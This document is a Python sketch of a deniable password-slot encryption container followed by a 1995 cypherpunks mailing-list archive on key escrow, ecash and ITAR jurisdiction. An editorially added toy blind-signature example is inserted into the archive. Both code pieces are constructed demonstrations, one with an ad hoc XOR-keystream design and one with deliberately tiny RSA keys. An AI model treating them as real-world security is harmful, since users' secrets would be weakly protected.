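    free = list(range(N_SLOTS))
    for password, cleartext in entries.items():
        if len(cleartext) > SLOT_BODY - 2:
            raise ValueError("cleartext too long for one slot")
        enc_key, mac_key = _keys(password, salt)
        body = (struct.pack(">H", len(cleartext)) + cleartext).ljust(SLOT_BODY, b"\0")
        nonce = secrets.token_bytes(NONCE)
        ct = _xor(body, _keystream(enc_key, nonce, SLOT_BODY))
        tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
        index = free.pop(secrets.randbelow(len(free)))   # random unused slot
        slots[index] = nonce + ct + tag
    return salt + b"".join(slots)


def open_with(container: bytes, password: str):
    """Return the cleartext this password opens, or None if no slot verifies."""
    salt, body = container[:SALT], container[SALT:]
    enc_key, mac_key = _keys(password, salt)
    for offset in range(0, len(body), SLOT):
        slot = body[offset:offset + SLOT]
        nonce, ct, tag = slot[:NONCE], slot[NONCE:-TAG], slot[-TAG:]
        expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
        if hmac.compare_digest(tag, expected):
            clear = _xor(ct, _keystream(enc_key, nonce, SLOT_BODY))
            (length,) = struct.unpack(">H", clear[:2])
            return clear[2:2 + length]
    return None


if __name__ == "__main__":
    # Constructed sample input.
    box = build({"first password": b"grocery list", "second password": b"meeting notes"})
    print(len(box), open_with(box, "first password"), open_with(box, "wrong"))
```

The container is the same length whether it holds one secret or eight, and a slot that does not verify under the keys in hand looks the same as noise, provided HMAC-SHA256 output is indistinguishable from random. The format itself still reveals that more slots could be in use.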

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 1995 08:04:27 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511172322.PAA23877@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

On Thu, 16 Nov 1995, Vladimir Z. Nuri wrote:


> but one distinction I do realize has to be made in all this is the
> difference between "fraud" and "breaking a system". the latter is
> a far more potentially serious problem with cryptographic security than
> the former. in fact cryptographic security attempts to deal with all
> fraud by making "breaking the system" impossible, and succeeds to the
> degree it accomplishes this.

I think this is extremely important to consider.  The functions which
define relationships between large numbers of variables, (such as say the
world economy) -- these functions are not "idiot proof". 

They can collapse.  And, yes Virginia, the system can be "broken".

To suggest that cryptography can address this issue is to misunderstand
the problem, and is part of this whole mindset that "security" is
cryptography. 

Our economies are, if anything, less resilient than they were in the not
too distant past.  They are far more vulnerable.  The introduction of new
business practices, such as the reduction in most firms' inventories, and
the ever greater reliance on "just in time" approaches has made us far
less able to sustain any interruption. 

The headlong introduction of "new variables" and new vectors into an
unstable system has never been "sound policy".  

I guess it's sort of like what happened when rabbits were introduced into
Australia.  An eco-catastrophe. 

Perhaps, we can all agree that existing systems are best "not
destabilized".  Then again, I'm not the one who gets his jollies by
rocking the boat.  I get mine elsewhere.

I guess here then is the real question, what is the fallback plan when 
something does go catastrophically wrong??  What then, hand-wringing, and 
saying that it "exceeded our theoreticians predictive capabilities" just 
does not suffice.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 18 Nov 1995 04:59:47 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in UK ?
In-Reply-To: <Pine.BSD.3.91.951117025209.5772G-100000@ahcbsd1.ovnet.com>
Message-ID: <199511172025.PAA13462@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Could you please explain what this has to do with cryptography?

"James M. Cobb" writes:
>  
> 11 16 95 The Electronic Telegraph runs a newsstory headed 
>  
>    Doorstep polish researcher was whiplash injuries spy 
>  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Sat, 18 Nov 1995 09:51:46 +0800
To: cypherpunks@toad.com
Subject: Dec 5th KE meeting details
Message-ID: <9511172033.AA09548@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 13 Nov 1995 13:15:32 -0500
From: Elaine Frye <frye@micf.nist.gov>


November 8, 1995


To:  Key Escrow Distribution List

From:  Ed Roback, NIST

Subject:  Planning for December 5th Meeting

At the September 6-7, 1995 key escrow issues meeting, I received a number of
comments that the government presentations should have addressed more topics
in greater detail.  To respond to this concern, I would like to request
submissions of any specific questions/issues related to the draft criteria
that you would like to see addressed on December 5th.  I cannot guarantee we
can meet all requests, but your suggestions will greatly help in planning
the meeting agenda and government presentations.

Please forward your questions/issues/ideas to me via e-mail at
"edward.roback@nist.gov", fax at 301-948-1784 or telephone on 301-975-3696.  

FYI, the current outline for the December 5 meeting is as follows:

A.      Government presentation of draft criteria, followed by Q&As

B.      Industry presentations on draft criteria

C.      Breakout sessions on criteria
          (a suggestion has been made to also have one on policy issues)

D.      Reports from breakout sessions

E.      Wrapup

Remember, also, that if you would like to make a presentation at the
meeting, you are asked to contact Elaine Frye at "elaine.frye@nist.gov".
You may also bring written comments to the meeting for distribution (our
estimate is that 250 copies are necessary.)

Thank you.
*****************************************************
Elaine Frye
Computer Systems Laboratory, NIST
Bldg. 225/Rm.B154
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1784
*****************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sat, 18 Nov 1995 08:13:28 +0800
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
Message-ID: <199511172357.PAA03710@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
>
>Community ConneXion today announced that it has become the first and
>only Internet Service Provider in the world to allow for payment using
>ecash, a digital cash system developed by DigiCash bv, of Amsterdam,

And, er, we're second. Ditch that 'only' part :)
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 1995 08:36:19 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511180014.QAA29549@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 Nov 1995, Bill Stewart wrote:

> >>Does anyone know the ostensible justification for this?  
> 
> Isn't the NCSA government-funded?  If so, they've probably got
> less slack in what they can get away with than private citizens;

I think that government-funding does give a certain degree of control --
the control that comes with the budget axe.  Private citizens
alternatively, get to face a different type of tool. 

They get to face stuff like RICO provisions, which "effectively" -- as
they are presently used, rather than as they were written and intended to
be used -- tend to allow the government to "influence" private citizens. 

> the NSA's got more leverage over their funding, especially if
> "Supercomputer Applications" are often military or civilian-govt.

I doubt that the NSA approves the NCSA's budget.

Far more likely would be for the NSA to use a rogue programmer at the
NCSA.  Someone who might hide some very damaging code into one of the
existing applications without anyone (else) knowing about it. 

I could even see an independent doing this simply to profit from it.  I
could see someone doing something like that.  It's no different really
than the "free" programs that were given away years ago which appeared to
be useful but actually contained "poison code". 

> Not only do they have to worry about ITAR as law, they have to
> worry about their continued cash flow.

Like I said, I don't believe in the "grand conspiracy" model.  I tend
toward "contained" enterprises. 

All the more reason though, NEVER to use black-box code, and all the more 
reason for public open review of code.  NSA and ITAR aside ... safe 
computing is safe computing and is in everyone's collective interest.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 18 Nov 1995 06:01:58 +0800
To: Michael Smith <smithmi@dev.prodigy.com>
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <199511171958.OAA30121@tinman.dev.prodigy.com>
Message-ID: <Pine.SUN.3.91.951117154130.3578F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


sorry, but there is a right to remain silent in Europe:

[quoting from footnote 360 (whatsamatter you didn't get that far?) of my
Clipper paper:] 

The European Court of Human Rights recently ruled that the
right to remain silent is guaranteed under the European
Convention on Human Rights (formerly known as the Convention for the
Protection of Human Rights and Fundamental Freedoms), Nov. 4, 1950, art.
6(1), 213 U.N.T.S. 221. See Funke v. France, 256 Eur. Ct. H.R. (ser. A) at
8 (1993) (holding that Article 6(1) of the European Convention on Human
Rights guarantees the right against self-incrimination); Ying H. Tan, Use
of DTI Interviews Unfair, INDEPENDENT (London), Sept. 30, 1994, at 30
(reporting the decision of the European Commission of Human Rights in
Saunders v. United Kingdom). 



On Fri, 17 Nov 1995, Michael Smith wrote:
> >
> >>Forgive me if this point has already been raised, but couldn't an 
> >>objection to such laws be based on the protection against 
> >>self-incrimination? 
> >
> >There is no such right in most (if not all) european countries. In
> >France there is not even the presumption of innocence.
> 
> [Further depressing news deleted]
> 
> Yes, this was my understanding. I guess the point I was groping 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 18 Nov 1995 06:47:49 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tDf8g-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951110003648.3551H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[sorry for the delay, things are busy here, and apologies too for the 
length of this thing...]

Misunderstanding, piled on misunderstanding, piled on disagreement.
I'll try to focus on the big points, and let the small stuff slide.
Let the record show that Prof. Junger and I still agree on lots of stuff 
that's outside this debate.  I wasn't trying to attack him before, and 
I'm not trying to start a flamewar now.

Main point for the busy:  Claims that the US government could apply the 
ITAR to 2 foreigners abroad and get a US court to buy it are, IMHO, 
unfounded.

On Thu, 9 Nov 1995, Peter D. Junger wrote:
[...]
> seem to have two different areas of disagreement:  (i) whether the
> ITAR's provisions relating to cryptographic software apply to foreign
> persons who disclose (or transmit) cryptographic software to another
> foreign person without the United States

[....the Itar is unconstitutional....]
Yes.
> 
> Now Mr. Froomkin says:
> 
>   In short, in this particular case the ACEA, and by extention the
>   ITAR, doesn't "say what it says" it "says what it must mean".
> 
> (And I dare him to make that assertion in the faculty lounge at Miami
> when some of the more critical and analytically inclined members of
> the Miami law faculty are present.)  I would take this as an admission

I would say it anywhere.  Some days I would even claim to be one of those 
people...

> that the ACEA and the ITAR does say what it says (even if it must mean
> something else) were it not for the fact that--and this was my ``ultra
> vires'' point--that the ACEA doesn't say it.
> 
> (In discussing the quoted passage I am assuming that ``extention''
> must mean ``extension'' and that it is not used as the opposite of
> ``intention'', if only because I don't know what the latter would be.
> But on the other hand the only dictionaries I have to hand are the COD
> and the on-line version of Webster's Collegiate.)
> 
> The AECA doesn't contain any definition of ``export'' whatsoever; the
> whole issue that we are discussing turns on the interpretation of what
> the ITAR says when it defines ``export'' as including:
> 
>   Disclosing (including oral or visual disclosure) or transferring
>   technical data to a foreign person, whether in the United States or
>   abroad ....
> 
> Now Mr. Froomkin seems to be contending that this language must be
> interpreted as it would be interpreted by some sort of neo-Platonic
> court (probably sitting in Rawls's original position by designation),
> which he calls ``any court''.  The contention is:

Nope.  Never said it, didn't mean it.  I mean a good ol' garden variety 
US federal court.

>   any court construing the AECA would inevitably read the prohibition
>   on "exporting" to a foreign person as not applying where the nation
>   lacks jurisdiction.  
> 
> Now it was my argument--which Mr. Froomkin helpfully calls an ``ultra
> vires'' argument--that any court reading the AECA would notice (i)

Here's a misunderstanding (for which I'm happy to take full 
responsibility).  What I meant by the "ultra vires" point is this:
There are lots of ways in which an agency action can be struck down by 
the courts.  Two of them are:

1) The agency interpreted the statute correctly, but the statute was 
unconstitutional -- beyond Congress's powers under the constitution.

2) The agency interpreted the statute Incorrectly, and tried to do 
something beyond the powers delegated to it by congress (the nice thing 
about this is that one doesn't even reach the issue of whether Congress 
could, in theory, have delegated the power in question).

> that there is no language in that act defining ``export'' and (ii)
> that ``export'' does not mean disclosing, or even transferring,
> information (which is what cryptographic software is) and (iii) that,
> in consequence, the Office of Defense Trade Controls exceeded its
> congressionally granted authority, and therefore its constitutional
> authority, when it came up with the perverse provision that is at
> issue here.  But that is the subject of my other, as yet unwritten,
> message.

That's what I meant by my ultra vires assertion.  Type (2) above.  So we 
agree in a sense as to what this problem is -- but I call this a case of 
an agency misconstruing the statute, not a "separation of powers" problem.

Let's assume, for the argument, that I'm wrong and that the agency read 
the statute reasonably (note under Chevron it doesn't have to read it 
"right" just reasonably).  

Does the agency read the statute to apply to two foreigners talking on 
the beach at Calais?  No it does not.   

Did Congress intend the statute to be applied to the two foreigners?  No
evidence that it did. 

Would or should a court read the statute to apply to two foreigners etc.
in the absence of a clear direction from Congress to that effect? No. 

Why not?  Two main reasons.  One is the one you identify:
> Now I take it that Mr. Froomkin's contention turns on the claim that
> Congress lacks jurisdiction under international law to pass a
> statute--or authorize a regulation--that makes it a crime for a
> foreign person to transmit something to another person when both of
> them are outside the United States.  So as to avoid the other

The other one is that even if Congress had the jurisdiction, the court 
would be reluctant to read the statute that way, with the implications 
for foreign relations, comity, etc etc without clear directions to do 
so.  And if you think the court would just formalistically follow the 
words of the statute, see eg Church of the Holy Trinity, 143 US 457 and 
its progeny.

> constitutional and ultra vires and so on issues, let us assume that
> Congress were to amend the AECA to make it a crime ``to transfer a
> cryptographic device to a foreign person within the United States or
> abroad without first obtaining a license or a waiver of jurisdiction
> from the Office of Defense Trade Controls.''
> 
> And now assume that someone, F, who is a foreign person and who has
> never been in the United States transfers a cryptographic device that
> was not made in the United States or by a United States company to
> another foreign person who has never been in the United
> States.  And now assume that F does come to the United States on a
> holiday and that he is arrested and indicted for violating the AECA in
> that he did transfer a cryptographic device to a foreign person.
> 
> The first thing to notice is that the indictment is not defective.
> The only defense--since it is the only one that we are interested in
> and we control the hypothetical--is: ``but that was in a foreign
> country'' and therefore the United States has no jurisdiction under
> international law (or under something) to treat F's actions as a
> crime.
> 
> So the defense moves to dismiss the indictment on those grounds.  And the
> prosecution stipulates that the acts charged occurred in a foreign
> country, that F is a foreign person, etc.
> 
> On those facts I would hope that the court would construe the statute
> as not covering F's actions outside the United States and would dismiss
> the indictment, but--considering that the statute specifically says it
> applies both within the United States and ``abroad''--I am not nearly
> as sanguine as Mr. Froomkin is.  But let us assume that the indictment
> is dismissed.

I cannot imagine that the court would do anything but dismiss on these 
facts. 

> 
> And now the hypothetical provision in the AECA is again amended by
> congress to make it a crime ``for (i) a United States citizen to
> transfer a cryptographic device to a foreign person within the United
> States or abroad or (ii) a foreign person to transfer a cryptographic
> device to a foreign person within the United States or abroad, without
> in either case first obtaining a license or a waiver of jurisdiction
> from the Office of Defense Trade Controls.''

Note that now we are more explicit than in the AECA.
> 
> And now assume that F', who has never been in the United States
> transfers a cryptographic device to a foreign person and thereafter
> comes to the United States and is arrested and indicted for violating the
> hypothetical provision of the AECA.  It would seem to me that there is
> no way that any but the most willfully wrong-headed court (and there
> are, I admit, such courts) would construe the hypothetical provision
> as not covering F's actions, since it does so clearly cover those
> actions.  I mean that there is no way that the court can get away with
> concluding that it does not mean what it says.
> 
> So what can F' do now?  Well, he could try to raise the claim that the
> lack of ``jurisdiction''--which is the justification for Mr. Froomkin's
> ``any court'' construing the ITAR's actual provisions would not apply
> to F or F'--is a ground for dismissing the indictment.
> 
> But how can he raise that point?  He can't very well deny that the
> court has jurisdiction over his person--he's sitting in the court with
> shackles on--and he can't get away with claiming that the court
> doesn't have jurisdiction to try him for violating the AECA.
> 
> So it would seem that F's only hope would be to move to dismiss the
> indictment on the ground that to continue the prosecution would be to
> deny him due process because the United States lacks jurisdiction
> under international law.

There are a number of other arguments he could make.  E.g. denial of due 
process for lack of notice.  Unconstitutionality of the statute as 
exceeding the powers of congress as a violation of international law.  A 
weaker argument would be an analogy to the ex post facto clause -- now 
the government seeks to apply its laws to him after the fact.  I do not 
think that the Nuremberg precedent would be contrary, since the claim of 
the US there was that some laws of man and nations are always in force 
everywhere.  Restrictions on crypto exports do not fall in that class.

> 
> Now I am no expert in this area, but I would be surprised if the
> courts would recognize this as a constitutional defense.  As I understand
> it from talking with somebody here at CWRU who is knowledgeable, the
> courts of the United States tend to defer in such cases to Congress

A vast and unhelpful oversimplification.  What do you mean by "such 
cases"?  Criminal prosecutions of US citizens for messing in foreign 
policy is one thing; criminal prosecutions of foreigners for acts that 
have foreseeable effects here is another thing; criminal prosecutions on 
the facts above is a whole different thing.

> and the executive--when they are in agreement, as they would be in our
> hypothetical--and principles of international law count for little.

It is certainly true that as Justice Jackson put it, the powers of those 
branches are greatest when they agree.  But the constitution trumps all.  

> 
> So F' will ``inevitably''--to use Mr. Froomkin's word--be convicted of
> the crime of delivering a cryptographic device to a foreign person
> outside of the United States.

I do not agree.  See above.

> 
> Now let's get back to the ITAR as it is actually written.  In an actual
> criminal action brought against a foreign person who is accused of
> disclosing cryptographic information to a foreigner outside the United
> States--not that I think such an action will ever actually be
> brought--the government can point out to the court the facts that I
> have just discussed, so the court will be aware that there is no
> constitutional provision requiring the dismissal of the indictment, even
> if the indictment is contrary to international law.  And a real court,
> as opposed to Mr. Froomkin's ``any court'' might in those
> circumstances feel free to determine that the ITAR means what it says.
> (That's just common sense.)

But no.  First there are the constitutional arguments.  Then there is the 
idea that we interpret the statute to avoid the constitutional and 
international problems.  Then there is the problem that there are no 
grounds to think that Congress ever intended to reach foreigners in such 
cases (and Holy Trinity Church, 143 US 457 (1892) still gets cited 
(despite its anachronistic view of religion)).

> 
> And, were the government ever to bring such a case, it would argue,
> and I think that it would convince a lot of real judges, that the
> criminal action does not violate international law because the United
> States is protecting its own economic interests by prosecuting foreign
> persons who disclose cryptographic information to other foreign
> persons outside the United States.  The government's lawyer will
> argue:
> 
>   Judge, the United States is in a real bind.  It is absolutely
>   necessary for our national security that we forbid the export of
>   cryptographic software.  But, on the other hand, as those
>   Cryptopunks keep pointing out, we are destroying our computer
>   industry by enforcing the ITAR against American companies.  So the
>   only solution is to apply the ITAR against foreigners as well so
>   that the American computer industry will have a levelled--I mean a
>   level--field to play upon.  And the anti-trust cases make it
>   absolutely clear that the United States does have jurisdiction to
>   enforce its laws against foreign criminals who break those laws
>   outside of the United States when their crimes have a negative
>   effect upon the economy of the United States.
> 
> I am afraid that most federal district court judges would buy that
> argument, and I am not even sure that Mr. Froomkin's ``any court''
> wouldn't buy it. 
> 
I think many district judges, most appellate judges, and almost every 
supreme court justice would at least reject, if not laugh at, that 
argument.  The trend is away from assertions of jurisdiction over 
foreigners without minimum contacts, e.g. Asahi (sp?).

> And, in any case, if such a criminal case were to be brought, the
> government would almost certainly be able to allege additional facts
> to help justify the claim that the US does have jurisdiction over the
> matter under international law.

I'm sorry, but everything that follows the line above is irrelevant.  If
there are other grounds to prosecute, the court will use those and avoid
the constitutional problem.  If the foreigner isn't really foreign, then
he's not a foreigner.  I'm going to respond in detail anyway because I
think that the FUD factor may be coming into play... 

> 
> For example, the defendant might be French, and the French government
> might be cheering the United States government on.  If the crime is a
> crime under both French law and the law of the United States then
> there is going to be no problem with the United States asserting
> jurisdiction.  (That is, if I understand it correctly, Mr. Froomkin's
> murder example.)

I don't see what dual criminality has to do with this.  Am I supposed to 
be on notice that if I do an illegal thing here to my neighbor, I'm 
supposed to be at risk of prosecution in Sri Lanka?  Anyway, recall that 
in the original hypo foreigner A is talking *legally* to foreigner B.  
Even if they are not, it's not within the competence of the US 
government to do anything about it.  Nor -- I have to say this over and 
over and over and over -- has the US government ever asserted in any form 
that it would seek to do anything about this.  Just because an 
over-literal reading of a regulation could lead to that view does not 
equal an actual assertion of jurisdiction by the government.

> 
> Or the defendant may have studied cryptography in the United States,
> before he returned home and disclosed the information.
>
Not relevant.  Note, by the way, that on these facts the "export" was by 
the (US person?) who taught the foreigner crypto in the US, not later.
 
> Or the information that he disclosed had previously been unlawfully
> exported from the United States in violation of the ITAR (PGP, for
> example).

Not relevant.  

> 
> Or the foreign person is an employee of a United States company or a
> foreign company doing business in the United States.
> 
Not a foreigner, or the export is traced to a non-foreigner who then is 
the one charged with the ITAR violation.

> Or even that the disclosure was done by a message transmitted over the
> Internet that happened to be routed through the United States.

So what? The people are still outside the US.

> 
> But the matter is even more simple than that since the government is
> not going to bring those criminal charges against a foreign person or
> a United States person or anyone else if they can possibly avoid it.
> The ITAR's provisions on cryptographic software are used by the
> government to spread fear, uncertainty, and doubt, and to discourage
> the spread of strong cryptography.  Since an actual criminal case
> would almost certainly result in at least significant parts of those
> provisions being held unconstitutional, the government is not going to
> bring such a case if it can find any other ways of satisfying its
> goal.
> 
> And looked at that way, our foreign person who discloses cryptographic
> software to one or more other foreign persons abroad is going to be
> the perfect fall guy.  As I have suggested before, the government will
> simply bar him from getting a visa to enter the United States since
> violation of United States foreign trade regulations is a ground for
> denying a visa--at least an immigrant's visa.  And, despite Mr.
> Froomkin's claim that our foreign person would have a cause of action
> if his ``petition'' were denied, he would probably have no recourse
> whatsoever.  Certainly he would have no claim that the United States
> has no jurisdiction to exclude him for acts done by him outside the
> United States; the United States has jurisdiction to exclude
> foreigners for things that the foreigners did outside the United
> States, like believing in polygamy.  And a foreign person outside the
> United States may not have standing to complain of violations of his
> freedom of speech outside the United States in an American court.
> 

I invite you to consider the recent decision of the 9th circuit that 
foreigners in the US have full 1st Am. rights.  Of course, the position 
of the would-be entrant is not the same as the position of even the 
temporary visitor to our shores, since constitutional rights don't attach 
to foreigners until they are in the country, but the language of that 
case is very suggestive.


> But let us assume, contra-factually that Mr. Froomkin is right, and
> that the poor, excluded foreign person would have a good cause of
> action to force the government to give him a visa.  (Though I really
> am curious as to what that action would be.)  That cause of action is
> going to cost tens of thousands of dollars to pursue, and it will take
> years before it is resolved in favour of our foreign person, who will
> be excluded--or sitting in jail with a bunch of Cuban and Chinese
> refugees--until the case is resolved in his failure.

Yes, litigation is expensive.  The foreign person unjustly excluded on 
this hypo will spend the time at home, writing crypto for profit, and 
reducing our tax base.  Meanwhile academic lawyers such as us will be 
representing her free of charge.  The government is sometimes unjust; 
even when you win against it you are worse off often than if you hadn't 
had to fight.  That's a wholly different issue from whether you win in 
court, which is what I thought we were arguing about.

> 
> I am sorry to have written such a long message, and to have been so
> slow in writing it, but I think that part of the problem is that both
> Mr. Froomkin and I were shooting from the hip, and that is why our
> disagreement grew.
> 
> But perhaps it has all been worthwhile, for I do think that there are
> a few useful conclusions that can be drawn from this discussion:
> 
>   (i) We academic lawyers tend to try to settle real world questions
>   as if they were academic questions;

Speak for yourself please.

I do not accept this accusation.  I assert that my "solution" to the
"problem" of whether a court would allow a criminal prosecution of a
foreigner, however "evil", for discussing crypto with another foreigner in
a foreign locale absent the most explicit and direct instructions from
Congress is the correct one: probability near zero.  Direct, clear
instructions from Congress supported by a legislative history or
legislative findings that made it clear that this was a result Congress
intended would raise the probability considerably, but I'd still bet on
the court striking the statute down as violating due process.

The academy is part of the real world.  All so-called real world questions
are fit subjects for academic study.  Much of my work is inspired by
concrete problems, or is (I hope) applicable to them.  Some of my work is
more abstract.  The applications are less immediate.  I'm proud of that
too. 

> 
>   (ii) It is never safe to assume that any court will construe a
>   statute or a regulation as meaning something other than what it
>   says; 

It is at least as dangerous to believe that a court will formalistically 
apply text as if statutory construction, especially in the shadow of the 
constitution, were a mechanistic process.

> 
>   (iii) One can only construe a legal text in a particular context;
>   even if one thinks that one can figure out how any court would
>   interpret the text in question, one still needs to know how the text
>   got before the court; and

This is a fair point.  The facts *do* matter.  This is why "hard cases 
make bad law."  

> 
>   (iv) The fact that you can always sue the police for unconstitutional
>   harassment isn't of much help when they reach for the rubber hose.

But the fact that you can do so is part of the reason why rubber hoses are 
less common than they would otherwise be.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 18 Nov 1995 06:47:46 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <m0tGVUJ-0008xnC@pacifier.com>
Message-ID: <199511172156.QAA15802@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes: [re: payee anonymity]
> It seems to me that this should be possible, within limits, if the potential
> payee could generate a "blinded" note to be delivered to the payer by
> anonymous means.  The payer could get the note certified by the bank,
> possibly given an extra "blind" if necessary  (is this possible? Desirable?
> Why not?) and then the resulting still-blinded but certified note is posted
> (in encrypted form, I supposed) to the 'net so that only the payee can
> decrypt and unblind it.

This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
dollar bill first." As I understand your protocol, Bob gives Alice an enote,
then Alice gives Bob an enote. Alice isn't paying Bob in any meaningful sense,
since Bob ends up with the same amount of e$ with which he started. Perhaps
you could clarify what you meant.

-Futplex <futplex@pseudonym.com>
"I'm not touched, but I'm aching to be...."
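
The flow jim bell describes in the quoted text above (payee blinds a note, payer has the bank certify it, payee unblinds it), as an added sketch that is not part of either message. It assumes Chaum-style RSA blind signatures, which the thread does not name; the toy bank key, the serial and every function name are constructed for illustration, with Bob as payee and Alice as payer as in the reply.

```python
import hashlib
import secrets
from math import gcd

# Constructed toy bank key: two Mersenne primes, far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N = P * Q                            # public modulus
E = 65537                            # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))    # bank's private exponent


def note_digest(serial: bytes) -> int:
    """Map a note's serial number to an integer mod N (toy hash-then-reduce)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def payee_blind(serial: bytes) -> tuple:
    """Payee (Bob): hide the note behind a random factor r before sending it."""
    while True:
        r = secrets.randbelow(N - 2) + 2      # 2 <= r < N
        if gcd(r, N) == 1:                    # r must be invertible mod N
            break
    blinded = (note_digest(serial) * pow(r, E, N)) % N
    return blinded, r


def bank_certify(blinded: int) -> int:
    """Bank: sign the value the payer submits; it never sees the real note."""
    return pow(blinded, D, N)


def payee_unblind(blind_sig: int, r: int) -> int:
    """Payee: divide out r, leaving the bank's signature on the real note."""
    return (blind_sig * pow(r, -1, N)) % N


def verify(serial: bytes, sig: int) -> bool:
    """Anyone: check the bank's signature on a note with the public key."""
    return pow(sig, E, N) == note_digest(serial)


def run_payment(serial: bytes) -> dict:
    """One payment: Bob blinds, Alice has the bank certify, Bob unblinds."""
    blinded, r = payee_blind(serial)      # Bob -> Alice, over an anonymous channel
    blind_sig = bank_certify(blinded)     # Alice -> bank -> Alice
    sig = payee_unblind(blind_sig, r)     # posted for Bob, who alone knows r
    return {
        "seen_by_payer_and_bank": (blinded, blind_sig),
        "note": (serial, sig),
    }


if __name__ == "__main__":
    result = run_payment(b"constructed-serial-0001")
    serial, sig = result["note"]
    print("note verifies:", verify(serial, sig))
    print("payer or bank saw the real digest:",
          note_digest(serial) in result["seen_by_payer_and_bank"])
```

Only the holder of r can turn the certified value into a spendable note, and neither value that passes through the payer and the bank matches the note that is later deposited.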




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 18 Nov 1995 07:39:08 +0800
To: cypherpunks@toad.com
Subject: Re: Corrections about Bob Noyce and Intel
Message-ID: <199511172211.RAA12522@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Worth magazine of Dec/Jan has a lubricious article on "The 
Super Investors of Silicon Valley":


" 'Rise of the Silicon Patriots,' by Donald Katz. If their egos 
and paychecks are oversized, so is their impact on the economy 
and culture. It's not for nothing that California's venture 
capitalists think they're at the center of the universe."


It traces some of the mauling by rapacious VC tigers of unwary 
techno-bambis and gleefully vaunts winner-take-all when the 
chips are down (multiple puns there) -- commensurate with the 
flatulent flattering flummoxing of this "financial 
intelligence" oilslicker.


For more FFF FinInt organ-grinding the monkeys, see 
"Downloading Warren Buffet's Brain."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 18 Nov 1995 09:30:24 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in Indonesia ?
Message-ID: <199511180111.RAA12769@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:54 PM 11/17/95 -0500, "James M. Cobb" <jcobb@ahcbsd1.ovnet.com> wrote:
>An 11 17 95 Reuter Information Service newsstory headlined 
>     Politics, not sex, is Indonesian Internet's concern 
...
>   Activists in Indonesia who use the Internet say it is a power- 
>   ful tool for distributing information in a society where self- 
>   censorship abounds, newspapers are tightly controlled, jour- 
